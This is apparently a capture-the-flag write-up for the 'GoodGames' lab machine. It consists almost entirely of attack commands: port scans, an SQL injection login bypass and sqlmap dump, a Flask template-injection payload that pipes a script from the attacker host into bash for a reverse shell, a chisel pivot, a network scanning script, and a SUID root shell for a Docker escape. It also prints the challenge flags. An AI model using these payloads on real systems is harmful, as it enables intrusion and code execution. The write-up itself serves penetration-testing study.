Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.130 | TCP:80 |
$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130
bash
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htbSQLI
# echo '10.10.11.130 goodgames.htb' >> /etc/hosts
$ dirsearch -u 'http://goodgames.htb'
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac
email=1%40gmail.com'--+&password=123
email=1%40gmail.com'%20OR%20'1'='1'--+&password=123
$ sqlmap -r sqli -p email --batch
$ sqlmap -r sqli -p email --batch -D main -T user --dump
email:admin@goodgames.htb
username:admin
password:superadministrator
# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts
Flask SSTI Injection
http://internal-administration.goodgames.htb/login
bash
POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
Upgrade-Insecure-Requests: 1
name={{9*9}}
name={``{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}
User.txt
388118f20c90df4d38744d9ac624dd43
Privilege Escalation : Docker Escape
Server:
$ chisel server -p 8000 --reverse
Client:
# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks
Server:
$ vim 10.10.11.130.conf
Client:
# arp -a
https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh
sh
#!/bin/bash
RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
ENDCOLOR="\e[0m"
hostname=$(hostname)
echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"
echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
ifconfig | awk '{print $(NF - -4), $NF}' | grep "172." | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"
echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"
which aws
which netcat
which nc.traditional
which curl
which ping
which gcc
which g++
which make
which gdb
which base64
which socat
which python
which python2
which python3
which perl
which php
which ruby
which xterm
which sudo
which wget
which nc
which nmap
which fping
echo -e "\n"
echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"
if [ -z $1 ]
then
echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
exit 1
fi
if [[ $# =~ 1 ]]
then
hosts=($1)
echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
fi
if [[ $# =~ 2 ]]
then
hosts=($1 $2)
echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
fi
if [[ $# =~ 3 ]]
then
hosts=($1 $2 $3)
echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
fi
if [[ $# =~ 4 ]]
then
hosts=($1 $2 $3 $4)
echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
fi
for host in ${hosts[@]}; do
echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
for i in $(seq 1 254); do
timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
a=$(echo $?)
if [[ $a =~ 0 ]]
then
array[${#array[@]}]=$host.$i
echo $host.$i >> hosts.txt
b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
then
echo "[+] HOST $host.$i ACTIVE [OS=Linux]"
elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
then
echo "[+] HOST $host.$i ACTIVE [OS=Windows]"
else
echo "[+] HOST $host.$i ACTIVE [OS=UNDETECTED]"
fi
fi
done; wait
done
for host in ${array[@]}; do
echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
for port in $(seq 1 10001); do
timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
done; wait
done# ./host_discovery.sh 172.19.0
Server:
$ sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1
Docker用户创建test文件在augustus目录中test所有者是root
#include <stdio.h>
#include <stdlib.h>
int main() {
setuid(0);
system("/bin/bash");
}# wget http://10.10.16.16/suid.c
# gcc suid.c -o suid
# chmod u+s suid
augustus@GoodGames:~$ ./suid
Root.txt
a42c76fe28f8a2556fa7e8794f133c15